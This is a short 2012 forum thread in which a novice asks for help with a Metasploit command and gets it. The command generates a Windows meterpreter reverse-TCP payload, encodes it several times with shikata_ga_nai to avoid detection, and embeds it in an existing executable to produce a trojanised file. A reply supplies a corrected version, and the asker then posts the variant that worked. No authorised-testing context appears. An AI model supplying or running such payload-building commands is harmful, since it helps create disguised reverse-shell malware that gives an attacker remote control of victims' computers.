daven Posted February 18, 2012 Share Posted February 18, 2012 hey guys, i'm new here in this thing so i might need some help I typed this command - msfpayload windows/meterpreter/reverse_tcp LHOST=MYIP LPORT=1337 R | msfencode -t exe -x Desktop/like.exe -k -o Desktop/newlike.exe -c x86/shikita_ga_nai -c 5 however it wrote me x86/w.e failed: Not enough room for new section header... what i need to do about it? Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 18, 2012 Share Posted February 18, 2012 Example: msfpayload windows/meterpreter/reverse_tcp LHOST=localhost LPORT=443 R | msfencode -e x86/shikata_ga_nai -o msf.exe -c 5 -t exe Quote Link to comment Share on other sites More sharing options...
daven Posted February 18, 2012 Author Share Posted February 18, 2012 still.. i got problem.. this time its anouther problem- [-] x86/shikata_ga_nai failed: can't convert nil to string [-] No encoders succeeded Quote Link to comment Share on other sites More sharing options...
daven Posted February 18, 2012 Author Share Posted February 18, 2012 nvm.. the problem found. Quote Link to comment Share on other sites More sharing options...
int0x80 Posted February 20, 2012 Share Posted February 20, 2012 daven: Congrats on solving your problem. Going forward, please post the solution that worked for you so that future visitors can also utilize it :] Quote Link to comment Share on other sites More sharing options...
daven Posted February 20, 2012 Author Share Posted February 20, 2012 It just did not find the file So I created a new one when i added to the command X > filename.exe after this code (msfpayload windows/meterpreter/reverse_tcp LHOST=localhost LPORT=443) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.